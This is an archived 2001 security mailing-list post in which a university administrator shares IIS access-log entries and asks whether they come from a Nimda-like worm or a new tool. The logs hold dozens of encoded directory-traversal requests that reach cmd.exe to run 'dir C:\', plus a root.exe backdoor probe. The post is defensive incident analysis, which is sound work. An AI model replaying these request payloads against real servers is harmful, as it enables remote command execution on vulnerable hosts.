Hello everybody, has anyone seen this pattern of IIS attacks before? Could this be a new exploit tool or something like "nimda2"? On the other hand it seems that it is only trying the long known holes... ------------------------------- snip ---------------------------------- 195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/root.exe?/c+dir+C:\ HTTP/1.0" 404 210 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 234 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 244 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 234 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 240 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 240 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 240 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 244 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 234 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 246 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 246 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 242 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 242 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 246 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 246 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 242 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 242 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 253 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 253 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 240 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 240 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 235 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 235 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 253 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 253 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:44 +0100] "GET /samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 254 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:44 +0100] "GET /cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 403 258 "-" "-" 195.13.121.101 - - [30/Oct/2001:11:43:44 +0100] "GET /iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 256 "-" "-" ------------------------------------ snap -------------------------------- Timestamps are GMT+1. Any hints? egards, Thomas Haeberlen -- Thomas Haeberlen Rechenzentrum Universitaet Stuttgart (RUS) Abteilung Informationsdienste Allmandring 30 , D-70569 Stuttgart Email: haeberlenat_private-stuttgart.de Phone: +49 711 685 47 19 Fax: +49 711 678 76 26 ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Oct 30 2001 - 07:23:36 PST